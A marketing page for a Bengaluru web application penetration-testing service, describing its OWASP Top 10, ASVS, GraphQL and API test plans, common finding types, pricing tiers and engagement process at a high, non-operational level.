Penetration Testing · Web App Security

Web Application Security Testing Services in Bangalore

Manual-led, tool-augmented web application penetration testing from Bengaluru. OWASP ASVS L1–L3, OWASP API Top 10, GraphQL test plans, business-logic and IDOR testing. Findings filed straight into your Jira / Linear with severity, CVSS, and a suggested remediation owner.

Timeline
2–4 weeks
From (INR)
₹1,80,000
Delivered from
Bengaluru
Empanelment
CERT-In
web application security testing BangaloreOWASP ASVS audit Indiaweb pentest BengaluruGraphQL security testingAPI security testing OWASP API Top 10business logic flaw testing

Application-layer attacks need application-layer auditors. The cheap end of the Bangalore VAPT market — which prices a full engagement at ₹40,000–₹80,000 — runs Nessus or Acunetix against your application, formats the output into a 30-page PDF, and calls it a web application security audit. The output catches outdated jQuery libraries and missing security headers; it misses every business-logic flaw, every IDOR, every authorisation bypass, every authentication edge case, and every integration-seam issue between your application and its dependencies. Those are the findings that actually matter — the ones a determined attacker exploits and the ones your enterprise buyer’s security review asks about. This page describes the methodology our application-security specialists use to find them.

Why web application testing is different

Network VAPT and web application testing share the word "VAPT" but are different disciplines. Network VAPT examines the infrastructure plane — services, ports, protocols, configurations — and is largely tool-driven (Nessus, Nmap, Nuclei). Web application testing examines the application plane — the business logic implemented by the code your engineers wrote — and is largely manual. The skill set is different (a senior network engineer is rarely a senior application-security engineer and vice versa), the toolchain is different (Burp Suite Pro is the canonical web-app tool, equivalent to Nessus for the network world), and crucially the findings are different. The same client running a network VAPT and a web application test will receive two reports with almost no overlap.

The bulk of the value in a web application engagement comes from manual analysis. Automated tools find about 25% of real issues (typically the obvious ones — outdated dependencies, missing headers, basic XSS). The remaining 75% — and 100% of the highest-impact findings — come from an engineer who reads your sequence diagrams, runs your authentication flow under a debugger, traces your authorisation checks across endpoints, and identifies the moments where intent and implementation diverge.

Who in Bangalore needs this

Most Bangalore B2B SaaS companies need a serious web application engagement at least annually. The drivers vary by buyer mix:

SaaS companies pursuing SOC 2 / ISO 27001

Both frameworks require evidence of application-security testing. Generic network VAPT does not cover the application layer adequately for either auditor. We co-deliver web application engagements alongside SOC 2 and ISO 27001 in roughly 50% of those engagements; the bundling is detailed on our SOC 2 service page.

Fintech and BFSI vendors

RBI and SEBI require quarterly application-security testing for digital channels and customer-facing apps. Pure network VAPT does not satisfy the regulator’s expectation of "comprehensive penetration testing" — application-layer is now table stakes.

HealthTech and EdTech consumer products

Consumer apps handling PII or PHI need application-layer focus on data exposure, IDOR (the single highest-impact class for multi-tenant consumer apps), and authentication edge cases.

Companies after a public security incident

If your application has been the target of a credential-stuffing attack, a data-exposure event, or any other application-layer incident, the post-incident audit needs to be application-layer. We have run dozens of post-incident engagements in Bangalore and the typical finding is that the original attack vector is paired with two or three additional unexploited issues that would have been the next step.

OWASP Top 10 (2021) — what we test

The OWASP Top 10 is the most-referenced application security awareness document, currently in its 2021 revision (the 2025 revision is in draft as of this page’s last edit). Each category in the Top 10 maps to a specific test plan in our engagement.

A01 · Broken Access Control

The largest and most-impactful category. We test for IDOR (Insecure Direct Object Reference) across tenancy boundaries — can user A access user B’s data by changing an ID in the URL, request body, or JWT claim — vertical privilege escalation (free-tier accessing paid features), horizontal privilege escalation (admin functions accessible by non-admins), forced browsing, mass-assignment in update APIs, and CORS misconfiguration. This is where business-logic testing pays the highest return.

A02 · Cryptographic Failures

We test TLS configuration, cipher selection, certificate validation, hashing algorithm choice (bcrypt / Argon2 / scrypt for passwords; SHA-256 minimum for non-password use; never MD5 or SHA-1), encryption at rest, key management, and JWT signing implementation (the alg:none vulnerability is still found in roughly 5% of Bangalore engagements; weak HMAC keys in roughly 15%).

A03 · Injection

SQL injection, NoSQL injection, command injection, LDAP injection, OS command injection, server-side template injection (SSTI), and XML external entity (XXE) injection. Modern frameworks have largely eliminated trivial SQLi but second-order injection — where data passes through a sanitiser, gets stored, and is re-used in a context where the sanitisation does not apply — is still common.

A04 · Insecure Design

Architectural-level issues: lack of rate limiting, missing authorisation in microservice-to-microservice calls, optimistic-concurrency race conditions, time-of-check / time-of-use vulnerabilities, missing audit logging, business-logic flaws (this category overlaps heavily with our dedicated business-logic test plan).

A05 · Security Misconfiguration

Default credentials, verbose error messages, exposed admin panels, exposed cloud storage, insecure HTTP headers, debug mode enabled in production, exposed git directories, exposed backup files, exposed .env files. Catches an embarrassing number of issues in every engagement.

A06 · Vulnerable and Outdated Components

Dependency-chain analysis. We scan your package.json / requirements.txt / pom.xml / composer.json / Gemfile against the Snyk and OSV databases, identify direct and transitive vulnerabilities, and flag outdated runtime versions (Node, Python, PHP, Java, Ruby).

A07 · Identification and Authentication Failures

Password policy enforcement, account-lockout behaviour, credential-stuffing resilience, session fixation, session-token entropy, multi-factor implementation, password-reset workflow, single-sign-on integration security.

A08 · Software and Data Integrity Failures

Insecure deserialisation, untrusted CI/CD pipeline configuration, missing integrity verification on auto-update flows, mutable container tags in production.

A09 · Security Logging and Monitoring Failures

Missing audit logging on security-relevant events, log injection vulnerabilities, log-tampering protection, log-retention policy validation. Often a finding rather than an exploitable issue, but graded as it affects post-incident forensics.

A10 · Server-Side Request Forgery (SSRF)

URL-fetch features, webhook validators, image proxies, RSS importers, OAuth-callback validation. SSRF is one of the highest-impact findings in cloud-native apps because it provides a path to AWS / Azure / GCP metadata services and from there to credentials.

OWASP ASVS L1, L2, L3

The OWASP Application Security Verification Standard (ASVS) is a more comprehensive control catalogue than the Top 10 — currently in version 4.0.3 with v5.0 in late draft. ASVS organises 286 controls across 14 chapters and three verification levels.

Level 1 — Opportunistic

The minimum bar for any internet-facing application. Defends against opportunistic attackers using widely-available tools. Our default scope when the engagement is buyer-driven and no specific level is mandated.

Level 2 — Standard

Applications handling sensitive data — most B2B SaaS, all fintech, all healthtech, any consumer app at scale. Our most-common engagement level. ~250 controls verified.

Level 3 — Advanced

Applications protecting high-value or critical-impact data — banking core systems, healthcare clinical decision support, critical infrastructure, life-safety. Engagement is roughly 50% larger than L2 and pricing scales accordingly.

Business-logic testing — the actual differentiator

Business-logic testing is what separates a useful engagement from a checklist exercise. The methodology requires reading your application’s sequence diagrams, running it through its expected and unexpected flows, and probing the moments where business rules cross technical boundaries.

Recurring patterns in Bangalore B2B SaaS:

  • Free-tier-to-paid feature bypass — the front-end hides paid features but the back-end does not enforce the entitlement check on the API endpoint
  • Workflow-state-machine skipping — order goes from "draft" to "fulfilled" without passing through "approved"
  • Race conditions on monetary operations — discount-code application, refund processing, balance updates
  • Tenancy-boundary IDOR in B2B SaaS — user from tenant A enumerates resources of tenant B
  • Time-of-check / time-of-use on critical operations — file is verified, then re-read by the worker that processes it
  • Optimistic-concurrency exploitation — submitting two requests in parallel to bypass per-resource constraints
  • Privilege amplification via integration — Slack-bot OAuth scope grants more than the in-app role would

GraphQL-specific testing

GraphQL has its own class of issues that REST does not exhibit. Our GraphQL test plan covers:

  • Introspection exposure — schema visible to unauthenticated users in production
  • Depth-based denial of service — deeply-nested queries that explode resolver execution
  • Aliasing-based denial of service — single requests with hundreds of aliased fields
  • Batched-query rate-limit bypass — multiple operations in one HTTP request
  • Field-suggestion-based schema discovery — error messages suggesting valid field names
  • Authorisation gap at resolver level — endpoint-level auth checks are insufficient
  • Mutation-side-effect exploitation — mutations triggering downstream effects without authorisation

OWASP API Top 10 (2023)

For pure API engagements (where the front-end is not in scope, or the API is a separate product), we test against the OWASP API Top 10 (2023 edition):

  1. API1 · Broken Object Level Authorization (BOLA) — the API equivalent of IDOR, the single most-common high-impact API finding
  2. API2 · Broken Authentication
  3. API3 · Broken Object Property Level Authorization (BOPLA) — mass-assignment combined with property-level filtering gaps
  4. API4 · Unrestricted Resource Consumption — rate limiting, payload size, expensive operations
  5. API5 · Broken Function Level Authorization
  6. API6 · Unrestricted Access to Sensitive Business Flows
  7. API7 · Server Side Request Forgery
  8. API8 · Security Misconfiguration
  9. API9 · Improper Inventory Management — abandoned endpoints, undocumented versions, deprecated paths still serving
  10. API10 · Unsafe Consumption of APIs

Engagement methodology

Five phases, sequential per asset, parallelised across the engagement. Detailed in the VAPT methodology section; the application-specific specialisation is heavier on the threat-modelling and business-logic phases. Output is the same — a written report with reproduction, evidence, and remediation guidance per finding.

Pricing in INR

Tier 1 · Single app
Web App + API
₹1,80,000+ GST
  • One web application + its API
  • OWASP ASVS L1–L2
  • 2–3 week engagement
  • Two retest cycles
Tier 3 · L3 Advanced
High-Assurance Audit
₹6,80,000+ GST
  • OWASP ASVS L3 (286 controls)
  • White-box code review included
  • Architecture review session
  • 6-week engagement
  • Quarterly retainer option

Twenty common findings

  1. IDOR across tenancy boundaries (multi-tenant SaaS)
  2. Mass-assignment in user-update APIs (role escalation)
  3. JWT alg:none / weak-HMAC / missing-expiry validation
  4. Missing rate limit on authentication / password-reset / OTP endpoints
  5. Server-Side Request Forgery in URL-fetch / webhook / image-proxy
  6. Stored XSS in admin panels (production-skipped)
  7. Reflected XSS in error pages, search, redirect parameters
  8. SQL injection in poorly-parameterised search / filter / sort
  9. NoSQL injection in MongoDB-backed search
  10. Privilege escalation via missing authorisation in microservice-to-microservice calls
  11. OAuth scope over-grant (Google / Slack / GitHub integrations)
  12. Open redirect in login / sign-up callback parameters
  13. Race condition in discount / refund / balance operations
  14. Workflow-state-machine bypass
  15. Hardcoded API keys in front-end JavaScript bundle
  16. Verbose error messages exposing stack traces / DB queries
  17. Insecure file upload (content-type bypass, path traversal)
  18. Missing CSRF protection on state-changing operations
  19. Subdomain takeover via dangling DNS
  20. Vulnerable transitive dependencies in production builds

Web app security application by Bangalore industry vertical

Industry context shapes the test plan. Below is the application of our methodology to the verticals we deliver into most often.

BFSI — Banks, NBFCs, payment aggregators

BFSI web applications carry the highest threat model — well-resourced adversaries, regulatory expectation of comprehensive testing, and direct financial-transaction surface. Specific test areas: payment-flow business-logic (double-spend, replay, concurrent-transaction races), maker-checker bypass, dormant-account hijacking, fund-transfer authorisation flow, customer-impersonation paths via support-tool integration. Our BFSI engagements run quarterly per RBI expectations and produce reports designed for RBI examination submission.

Fintech and capital markets

Trading platforms, lending platforms, wealth-management platforms. Specific test areas: order-book manipulation surfaces, KYC-bypass paths, lending-eligibility circumvention, portfolio-data leakage between users, customer-data exposure via API misconfiguration. For SEBI-regulated entities, see our SEBI CSCRF page.

HealthTech — Telemedicine, diagnostics, EHR

Web applications handling PHI face DPDP sensitive-data exposure and clinical-governance expectations. Specific test areas: patient-record IDOR (the highest-impact finding class for telemedicine), prescription-tampering paths, doctor-patient-conversation-recording exposure, lab-result IDOR, role-based access between treating physician / consulting physician / billing-staff. Our HealthTech engagements add specific PHI-exposure test cases beyond standard scope.

SaaS — B2B exporters and consumer products

The largest single category. SaaS web app testing focuses on multi-tenant security: tenant-boundary IDOR, cross-tenant authorisation, tenant-context-switching attacks, customer-data isolation under shared-database architectures. Add to that the SOC 2 / ISO 27001 evidence-collection requirement and the buyer-side vendor-security review that the report feeds.

EdTech — Children’s and adult platforms

EdTech web applications serving children carry DPDP children’s-data obligations. Specific test areas: age-verification implementation, parental-consent flow integrity, prohibition on tracking and behavioural monitoring, advertising-SDK presence (which is generally prohibited in children’s contexts under DPDP), and data-minimisation enforcement.

Government and public-sector technology

Government web applications and citizen-services platforms. Our engagements here typically run under specific tender requirements and produce CERT-In compliant reports formatted for regulator submission. Specific test areas: identity-federation security with UIDAI / Digi-Locker / CSC, citizen-data IDOR, bulk-data-export prevention, document-tampering protection.

White-box vs black-box testing — when each is right

Most web application engagements default to black-box testing — we test from the perspective of an external attacker without source-code access. White-box adds source-code access; we read the code while we test, which substantially increases the finding rate and reduces the engagement timeline by 20–30%.

White-box advantages:

  • Hidden code paths surfaced (debug endpoints, admin functions not in normal UI flow)
  • Hardcoded secrets and credentials surfaced quickly
  • Dependency-chain analysis substantially deeper
  • Business-logic flaws traced through the implementation rather than inferred from behaviour
  • Race conditions identified by code-path analysis rather than fuzzing

White-box disadvantages:

  • Cost slightly higher (~30–50% premium)
  • Less representative of real-attacker discovery process
  • Some clients are unwilling to share source code with external auditors (we operate under NDA with strict access controls; most concerns are addressed by the access architecture)

Our recommendation: white-box for greenfield applications (where finding everything matters), white-box for high-risk verticals (BFSI, HealthTech), white-box for SOC 2 / ISO 27001 evidence cycles where comprehensiveness is the goal. Black-box for periodic external-perspective testing on established applications, for buyer-driven third-party-audit-acceptable testing, and for first-time engagements where the client is uncertain about source-code sharing.

API security deep-dive

APIs are now the dominant attack surface for most B2B SaaS applications. Where the front-end UI used to be the primary attack surface, the modern architecture exposes the API directly via SDKs, mobile applications, partner integrations, and public-facing developer portals. The API is now where the value lives and the controls have to live too.

The OWASP API Top 10 (2023 edition) is the canonical baseline; our methodology layers on the surface-specific specialisation that the API may need.

REST APIs

The dominant API style. Test plan covers OWASP API Top 10 plus surface-specific items: HTTP-verb tampering, content-type confusion, conditional-request abuse (If-Match / If-None-Match exploits), bulk-endpoint abuse, idempotency-key abuse.

GraphQL APIs

Detailed treatment earlier on this page. The depth-of-query, aliasing, batched-query, and field-suggestion attack surfaces are all GraphQL-specific.

gRPC APIs

Less common in Bangalore SaaS but used in service-mesh deployments. Test plan includes Protocol Buffer reflection, streaming-message abuse, gRPC-Web bridge security, deadline-propagation analysis.

SOAP / XML APIs

Legacy but still common in BFSI integrations. XXE, XML-bomb, WS-Security misconfiguration, SOAP-action manipulation are the main surfaces.

Webhook receivers

Increasingly relevant. Webhook-signature verification, replay-attack prevention, payload-validation, error-handling without information leakage.

Our default API engagement runs against the production API style; multi-API estates (REST + GraphQL + webhooks, common in modern SaaS) are scoped together and tested as integrated.

How a typical web app engagement runs week-by-week

Week 0 is the scoping conversation and the SOW. Week 1 is reconnaissance and threat modelling, and ends with a kickoff call where we present the threat model back to your team and confirm the testing-plan priorities. Weeks 2 and 3 are active testing — daily standups with your security team, immediate escalation of any P0 findings, no waiting for the report to surface critical issues. Week 4 is report drafting and peer review by a second senior engineer; the partner overseeing the engagement signs off on the deliverable. Weeks 5 and 6 are retest cycles after your team remediates; the final retest produces a closure report stamping each finding as closed, residual, or open. Most clients also receive a one-hour debrief call with the lead auditor where the team can ask questions about specific findings and remediation approaches; this is included in the engagement fee.

Evaluating a web app security vendor — six questions

The Bangalore web application security vendor population is uneven; the questions below separate substantive vendors during procurement. 1. Manual-effort percentage: what fraction of the engagement is senior-engineer manual analysis vs automated scanner output? Below 60% manual indicates a tool-output rebrand. We are 70%+ manual on every engagement. 2. Senior-engineer ratio: how many engineers with 5+ years application security work on the engagement, and what fraction of total engagement effort is theirs? Vendors staffing junior engineers behind a senior name are common; specific staffing transparency is the antidote. 3. Business-logic methodology: ask for the threat-modelling approach used per engagement. Vendors that conflate business-logic testing with vulnerability scanning are missing the highest-impact finding class. 4. White-box willingness: ask whether source-code review is offered, and at what marginal cost. Vendors declining white-box are typically less-confident with codebase analysis. 5. Retest cycles: how many retest cycles within the SOW? Retests-as-separate-engagement is the soft signal of a vendor expecting incomplete remediation. 6. Findings filing: will the vendor file findings directly into your Jira / Linear / GitHub Issues, with severity, CVSS, and suggested owner? Vendors that decline this are typically delivering report-only engagements that produce work for your team to file findings rather than pre-filing them.

We answer all six specifically and in writing during scoping.

To start a web application security engagement, the next step is a thirty-minute scoping call. Most engagements begin within five business days.

Frequently asked

Frequently asked questions

A network VAPT looks for misconfigured services, exposed ports, and known-CVE vulnerabilities at the perimeter or internally. A web application security test looks for issues in the application layer — the business logic, the authentication and authorisation flows, the data flows, the integration seams between services. Different skill set, different toolchain, different findings. Most cheap "VAPT" engagements miss application-layer issues entirely because the engineer doing the work is a network specialist running a Nessus scan. Our web application engagements are run by application-security specialists who have spent years breaking SaaS products.
All three are available. L1 is the baseline (any internet-facing application should pass it) and the default for entry-level engagements. L2 applies to applications handling sensitive data — most B2B SaaS, all fintech, all healthtech — and is our most-common engagement scope. L3 applies to applications protecting high-value or critical data — banking core systems, military, life-safety — and is rare outside of regulated finance and government. We will recommend the appropriate level after the scoping call based on what your application handles.
Business-logic testing examines whether the application enforces its intended business rules as opposed to whether the application is technically secure. Examples: can a free-tier user trigger a paid-tier feature by manipulating a request parameter? Can an order-fulfilment workflow be bypassed by skipping a state-machine step? Can a discount be applied repeatedly by submitting the coupon code in parallel? These are the issues automated scanners cannot find — they require an engineer who reads your sequence diagrams and understands what your software is supposed to do. Business-logic findings are routinely the highest-impact items in our reports.
Yes — and SPAs need different methodology than server-rendered apps. We test the JavaScript bundle for hardcoded secrets and exposed business logic, the API surface that the SPA consumes, the authentication and session-management implementation (typically JWT or session cookies with various edge cases), the client-side authorisation that the backend should not trust, and integration with third-party SDKs. Most modern Bangalore SaaS products are SPAs; this is our default mode.
Yes, with a separate methodology. GraphQL has a specific class of issues that REST does not: introspection exposure, depth-based DoS, query-aliasing-based DoS, batched-query rate-limit bypass, field-suggestion abuse for schema discovery, and authorisation that is enforced at the resolver level rather than the endpoint level. Our GraphQL test plan covers all of the above plus the standard OWASP API Top 10 mapped to GraphQL semantics.
Yes. Standard engagement includes Jira / Linear / GitHub Issues integration — every finding is filed as a ticket in your tracker with severity, CVSS, reproduction steps, evidence, and a suggested remediation owner based on the file paths the issue touches. We work to your existing labelling and component conventions; you do not adapt to our format.
We can test against either, with different rules of engagement. Staging is preferred because we can be more aggressive — try harder injections, longer-running checks, exploitation chains that would be visible to your other customers in production. Production testing is possible for read-only scope, with strict rate limits, blackout windows, and a coordination cadence with your on-call team. For new applications, we strongly recommend running the engagement in staging first; for existing apps where staging does not mirror production, we run a shorter production-only scope as a follow-on.
A single web application with associated API typically takes 2–4 weeks end-to-end: 3 days of threat-modelling and reconnaissance, 8–12 days of active testing, 3–5 days of report drafting and review, plus retest cycles. Larger applications (e-commerce platforms, multi-product SaaS suites, banking front-ends) take 6–8 weeks. We publish the timeline before kickoff.
Yes, on request. White-box testing is roughly 30% more efficient than black-box because we can see the code paths directly and identify issues that black-box would miss (hardcoded secrets in non-public files, code-path-specific business-logic flaws, dependency-chain vulnerabilities). We require read-only Git access for the engagement duration and return your repository unchanged. White-box adds ~₹60,000–₹1,20,000 to the engagement depending on codebase size.
Yes. Each CMS has its own attack surface — plugin vulnerabilities, theme injection, admin-panel exposure, REST API misconfigurations. Our engagement scope identifies the CMS and includes its specific test plan as part of the standard methodology. WordPress in particular has well-documented attack patterns we have tested for many times in Bangalore engagements.
Ready to scope this engagement?

Book a thirty-minute scoping call.

Tell us your framework, your stack and the deadline. You leave the call with a written scope, a fixed price in INR, and a kick-off invite.